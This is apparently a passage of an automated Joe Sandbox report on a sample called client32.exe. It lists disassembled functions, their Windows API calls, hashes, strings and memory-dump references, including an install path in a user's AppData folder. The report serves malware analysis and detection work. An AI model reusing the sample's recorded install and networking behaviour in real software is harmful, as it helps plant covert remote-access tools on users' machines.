                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressEnumErrorLastModulesProcProcess
                                                                              • String ID: EnumProcessModules
                                                                              • API String ID: 3858832252-3735562946
                                                                              • Opcode ID: 351c1b78ccc66f28b11d4baa3de3afe621d4e5b4e3ef8ffba07ad40319bec8af
                                                                              • Instruction ID: 9b5e3539268b9765696cce1e822b7e7c024a75bc75048a1df169525063cc1a5d
                                                                              • Opcode Fuzzy Hash: 351c1b78ccc66f28b11d4baa3de3afe621d4e5b4e3ef8ffba07ad40319bec8af
                                                                              • Instruction Fuzzy Hash: F9F05E72614618AFC710DF94D844E5B77A9EB48721F00881AF95A97340D6B0E811CBA0
                                                                              Function 6EEF5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6EEF5014
                                                                              • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF5034
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF503D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorFileLastModuleNameProc
                                                                              • String ID: GetModuleFileNameExA
                                                                              • API String ID: 4084229558-758377266
                                                                              • Opcode ID: 1fabd4b822d24a13f10a9ce8ba3b5351b1450e6212a08d877d49c1d00d782497
                                                                              • Instruction ID: c6fbe275ef727ad5450fda64680c7cdd1a4092173ee26769a7af6b18966e7191
                                                                              • Opcode Fuzzy Hash: 1fabd4b822d24a13f10a9ce8ba3b5351b1450e6212a08d877d49c1d00d782497
                                                                              • Instruction Fuzzy Hash: A9F0FEB2624618ABC720DF94E844F5777A9EB48751F10851AF94697240D6B1E8148BE1
                                                                              Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ChangeCloseCreateFindNotificationThread__wcstoi64
                                                                              • String ID: *AutoICFConfig$Client
                                                                              • API String ID: 3838223534-59951473
                                                                              • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                              • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                              Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeaveSleep
                                                                              • String ID: Push
                                                                              • API String ID: 1566154052-4278761818
                                                                              • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                              • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                              Function 6EEFA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,00000000,?,?,?,6EEFDA7F,?,00000000), ref: 6EEFA503
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6EEFA568
                                                                              • Sleep.KERNEL32(00000000,?,6EEFDA7F,?,00000000), ref: 6EEFA581
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898,00000000), ref: 6EEFA5B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                              • String ID:
                                                                              • API String ID: 4212191310-0
                                                                              • Opcode ID: 28c54fb12dbaa26732038b9a7929bcd56687d2fdb348d8162902d2e31fc99937
                                                                              • Instruction ID: 87be5300bf0571633a1a46523ea4ce05f9f4b03de0490f167c1704c5bb622daa
                                                                              • Opcode Fuzzy Hash: 28c54fb12dbaa26732038b9a7929bcd56687d2fdb348d8162902d2e31fc99937
                                                                              • Instruction Fuzzy Hash: 3421DAB2960E11DFDB319F98C850796B7BEAF82319F210827D8599B740D371A8428BD1
                                                                              Function 00F71020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCommandLineA.KERNEL32 ref: 00F71027
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00F7107B
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00F71096
                                                                              • ExitProcess.KERNEL32 ref: 00F710A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3402039725.0000000000F71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F70000, based on PE: true
                                                                              • Associated: 00000004.00000002.3402020033.0000000000F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f70000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                              • String ID:
                                                                              • API String ID: 2164999147-0
                                                                              • Opcode ID: a7522bc263354a55a09cf154841bfcf8877def38b19aef786e50783bd966e2c4
                                                                              • Instruction ID: c9a1e231b0d4952bc1ef2f577d36db22b7e7d5bd0e9a970b8de5ad93163acd31
                                                                              • Opcode Fuzzy Hash: a7522bc263354a55a09cf154841bfcf8877def38b19aef786e50783bd966e2c4
                                                                              • Instruction Fuzzy Hash: 1311C820C043C85AEF315F688848BEABF95BF06390F248046DCDDA614AD25648CFE777
                                                                              Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                              • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                              • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 1314093303-0
                                                                              • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                              • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                              • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                              • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                              Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentFileModuleNameProcess
                                                                              • String ID: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                              • API String ID: 2251294070-2350711247
                                                                              • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                              • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                              Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memset.LIBCMT ref: 11110262
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp
                                                                              • API String ID: 2803934178-2363596943
                                                                              • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                              • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                              • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                              • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                              Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle
                                                                              • String ID: \\.\NSWFPDrv
                                                                              • API String ID: 3498533004-85019792
                                                                              • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                              • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                              • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                              • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                              Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _calloc
                                                                              • String ID:
                                                                              • API String ID: 1679841372-0
                                                                              • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                              • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                              • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                              • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                              Function 6EEF8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 6EEF8FE4
                                                                              • getsockname.WSOCK32(?,?,00000010,?,037F2CD0,?), ref: 6EEF9005
                                                                              • WSAGetLastError.WSOCK32(?,?,00000010,?,037F2CD0,?), ref: 6EEF902E
                                                                                • Part of subcall function 6EEF5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6EEF8F91,00000000,00000000,6EF3B8DA,?,00000080), ref: 6EEF5852
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                              • String ID:
                                                                              • API String ID: 3066294524-0
                                                                              • Opcode ID: 175818b2f192d6e401f71244fc3a5cfca78c62400834a6e6c83ed38a4bfeef18
                                                                              • Instruction ID: bd566571945abdc08f658342d8fdef6965548135847e4d03132662ebaaf9796d
                                                                              • Opcode Fuzzy Hash: 175818b2f192d6e401f71244fc3a5cfca78c62400834a6e6c83ed38a4bfeef18
                                                                              • Instruction Fuzzy Hash: 98111872A0411CABDB00DFE9D811AFEB7BCEB49214F10496AEC09E7240EB716A159B91
                                                                              Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                              • __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                              • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
